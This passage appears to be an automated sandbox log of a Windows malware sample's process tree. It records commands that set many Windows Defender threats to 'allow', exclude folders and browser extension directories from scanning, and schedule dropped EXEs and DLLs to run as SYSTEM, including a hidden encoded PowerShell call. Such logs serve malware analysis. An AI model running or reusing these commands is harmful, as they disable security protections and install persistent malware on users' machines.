Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147914824\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147914824\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:6056 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:5508
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:5340
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:5144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:5364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:5368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:5384
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:3348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:5636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:5656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3264
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5672
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:5692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:5712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:5736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:5760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:5776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:5764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:1376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:2208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:3892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:1912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:5820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147914824 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:5856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147914824 /t REG_SZ /d 6 /reg:643⤵PID:1892
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NOWTtjuGDiydC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NOWTtjuGDiydC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OMeOFycTU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OMeOFycTU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RnBNRnIwUzVU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RnBNRnIwUzVU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kmKpunNFSNUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kmKpunNFSNUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\TtvXSoLtbVXOCJVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\TtvXSoLtbVXOCJVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VBkUndoRUYbskVcRK\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VBkUndoRUYbskVcRK\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rLJCaCpfIrfYjdgZ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rLJCaCpfIrfYjdgZ\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4700 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NOWTtjuGDiydC" /t REG_DWORD /d 0 /reg:323⤵PID:6076
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NOWTtjuGDiydC" /t REG_DWORD /d 0 /reg:324⤵PID:6112
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NOWTtjuGDiydC" /t REG_DWORD /d 0 /reg:643⤵PID:2780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OMeOFycTU" /t REG_DWORD /d 0 /reg:323⤵PID:5340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OMeOFycTU" /t REG_DWORD /d 0 /reg:643⤵PID:5508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RnBNRnIwUzVU2" /t REG_DWORD /d 0 /reg:323⤵PID:5348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RnBNRnIwUzVU2" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:5372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR" /t REG_DWORD /d 0 /reg:323⤵PID:5360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:5528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kmKpunNFSNUn" /t REG_DWORD /d 0 /reg:323⤵PID:5644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kmKpunNFSNUn" /t REG_DWORD /d 0 /reg:643⤵PID:5648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\TtvXSoLtbVXOCJVB /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\TtvXSoLtbVXOCJVB /t REG_DWORD /d 0 /reg:643⤵PID:4024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:5676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:444
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:5704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VBkUndoRUYbskVcRK /t REG_DWORD /d 0 /reg:323⤵PID:4476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VBkUndoRUYbskVcRK /t REG_DWORD /d 0 /reg:643⤵PID:5724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rLJCaCpfIrfYjdgZ /t REG_DWORD /d 0 /reg:323⤵PID:3516
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rLJCaCpfIrfYjdgZ /t REG_DWORD /d 0 /reg:643⤵PID:5732
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gsUNDBnMm" /SC once /ST 01:16:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
PID:5772
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gsUNDBnMm"2⤵PID:4860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gsUNDBnMm"2⤵PID:5212
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "coQLnzjOCQIuUMNyn" /SC once /ST 02:06:58 /RU "SYSTEM" /TR "\"C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\fyArOsB.exe\" Tp /xsRZdidkg 757674 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:5236
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "coQLnzjOCQIuUMNyn"2⤵
- System Location Discovery: System Language Discovery
PID:3484
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5824 -s 9522⤵
- Program crash
PID:5248
-
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.131⤵
- Modifies registry class
PID:5924
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5808 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:6060
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4644
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2780
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\84a8db342f8b424f8430d003de92c27b /t 1228 /p 38161⤵PID:4488
-
C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\fyArOsB.exeC:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\fyArOsB.exe Tp /xsRZdidkg 757674 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:5308 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bhzAbyJhiYArNEwhRY"2⤵PID:3628
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:4552
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2848 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:4876
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5244 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵PID:3880
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\OMeOFycTU\sDlzcs.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "VGggbamSlsorNxx" /V1 /F2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5580
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VGggbamSlsorNxx2" /F /xml "C:\Program Files (x86)\OMeOFycTU\IbVSERq.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:5044
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "VGggbamSlsorNxx"2⤵PID:4484
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "VGggbamSlsorNxx"2⤵
- System Location Discovery: System Language Discovery
PID:3628
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "sWuJIXBYaMGWKZ" /F /xml "C:\Program Files (x86)\RnBNRnIwUzVU2\MhVtTAB.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3288
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NNeqJVkrzmhrs2" /F /xml "C:\ProgramData\TtvXSoLtbVXOCJVB\zdDFEPa.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KHgAEdrkAvYTaiAFk2" /F /xml "C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR\ZPZMxro.xml" /RU "SYSTEM"2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvOgMXzRBPtqAKitkiY2" /F /xml "C:\Program Files (x86)\NOWTtjuGDiydC\tRAjDwC.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:5484
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kWTyeDFhQZoEtpUUx" /SC once /ST 00:25:51 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\rLJCaCpfIrfYjdgZ\EcPinGxb\tBCcthG.dll\",#1 /CKCdidL 757674" /V1 /F2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5192
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "kWTyeDFhQZoEtpUUx"2⤵
- System Location Discovery: System Language Discovery
PID:1028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "coQLnzjOCQIuUMNyn"2⤵PID:4848
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 21162⤵
- Program crash
PID:5284
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5824 -ip 58241⤵PID:5300
-
C:\Program Files\qBittorrent\qbittorrent.exe"C:\Program Files\qBittorrent\qbittorrent.exe" "C:\Users\Admin\Documents\the-longing-codex.torrent"1⤵
- Executes dropped EXE
- Modifies registry class
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:712
-
